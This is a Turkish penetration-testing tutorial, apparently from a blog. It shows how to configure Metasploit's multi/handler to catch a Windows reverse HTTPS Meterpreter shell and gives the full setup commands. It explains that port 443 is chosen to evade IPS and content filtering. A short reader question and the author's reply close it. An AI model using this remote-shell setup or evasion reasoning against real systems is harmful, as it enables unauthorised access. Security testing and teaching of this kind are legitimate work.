Bu yazıda “windows/meterpreter/reverse_https” şeklinde oluşturulan bir Payload tarafından gelen talep “exploit/multi/handler” istismar modülü tarafından yakalanacaktır. Ters HTTPS Meterpreter bağlantısının seçilmesinin sebepleri aşağıdaki gibi sıralanabilir:
- Son kullanıcılar tarafından en çok kullanılan işletim sistemi Windows işletim sistemidir. Bu sebeple Windows için payload türü seçilir.
- Sızma testlerinde, en çok kullanılan payload türü – Metasploit Framework tarafından sağlanan bir çok yeteneğe sahip olan – Meterpreter kabuğudur. Bu sebeple Meterpreter bağlantısı tercih edilmiştir.
- Kurumlar ağlarını çeşitli alt ağlara bölerler. DMZ adı verilen ağlarda web sunucusu veya mail sunucusu gibi internet ortamına açılan sistemler bulunur. Bu sistemlere doğru belli portlar açıktır. Bunun yanında, istemcilerin (personelin kullandığı bilgisayarların) bulunduğu ağlara internet ortamından direk erişim sağlanamaz. Ancak, istemci ve sunuculardan dışarıya genellikle 80. ve 443. portlar açılır. Böylece, HTTP ve HTPPS üzerinden hizmet veren sistemlere kurum içindeki personel erişim sağlamış olur. Eğer Ters HTTPS bağlantısı gerçekleştiren bir payload kullanırsa, hem TCP 443. porttan internet ortamındaki saldırgan bilgisayarına erişim sağlanmış olur, hem de şifreli trafik olduğu için (SSL inspection yapılmıyorsa) aradaki koruyucu cihazlar (IPS, İçerik Filtreleyici gibi) tarafından kolay bir şekilde tespit edilmemiş olur. Bu sebeple, sızma testleri (özellikle sosyal mühendislik sızma testleri) sırasında TCP 443. porttan ters HTTPS bağlantısı kuran payload modülleri tercih edilir.
Modülün seçimi ve kullanımı aşağıdaki gibidir:
search name:handler type:exploit
use exploit/multi/handler
show options
Not: MSF’in yeni sürümlerinde modül seçimi ile “msf exploit(handler) > ” yerine “msf exploit(multi/handler) > ” ifadesi görünebilir. Ayrıca modülün “use multi/handler” olarak da çağırılabileceği de görülmektedir.
use exploit/multi/handler
show info
back
use multi/handler
Modülün ayarlanması aşağıdaki gibidir:
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.244.148
set LPORT 443
set VERBOSE false
set ExitOnSession false
show options
Kullanılan “ExitOnSession” seçeneğinin “false” olarak ayarlanması ile birden fazla talebin yakalanabilmesi sağlanarak, Meterpreter kabuğuna otomatik olarak düşülmesinin önüne geçilir. Kullanılabilecek diğer önemli seçenekler SessionCommunicationTimeout, SessionExpirationTimeout, AutoRunScript olarak sıralanabilir.
Modül başlatılır:
exploit -j -z
Payload çalıştığında, bağlantı MSF multi-handler tarafından yakalanmış olur.
Payload özelliğine göre oturum elde edilmiştir.
sessions
Abi ben use/multi/handler yazdıktan sonra (handler) olması gerekirjen bende(multi/handler) oluyo nasıl çözebilirim
Merhaba
Sürümler ile alakalı bir durumdur. Not olarak yazıya eklendi. Teşekkürler.